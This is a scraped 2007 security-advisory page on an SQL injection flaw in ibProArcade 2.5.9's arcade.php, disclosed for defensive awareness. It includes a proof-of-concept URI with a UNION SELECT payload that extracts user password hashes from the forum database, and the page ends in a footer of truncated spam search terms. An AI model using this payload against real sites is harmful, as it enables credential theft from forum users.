about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ibProArcade Arcade.PHP SQL Injection Vulnerability


Title ibProArcade Arcade.PHP SQL Injection Vulnerability
Published 2007-02-15-12:00AM
Updated 2007-02-15-06:57PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  sp00k is credited with the discovery of this vulnerability.
Vulnerable  ibProArcade ibProArcade 2.5.9
Not Vulnerable  
Code   Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:06:54 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
12818.net smart gues phpbb 1.5 news for C Watersport CMS is Fre www.beibao RACF www.huoton action for 200 /compo Xdomain.bl cha10000.c Www.delk.c nudeimage www.looseo news for c Crack+Data Abrar news for c Abrar Siswa smp Advanced G Hatt Nagma sex Girls and CMS is Fre news for c bollywoods Free Kushb indianidea news for c 11334 Searching CMS is Fre mambo Remo mcafee 200 /compo web cms scarycar v S+E+X+V+I+ PH PROXY.h Esha Savixx\r\n sex felim WWW.SEXY C Www.hotger w w w s x maurizia nude baymo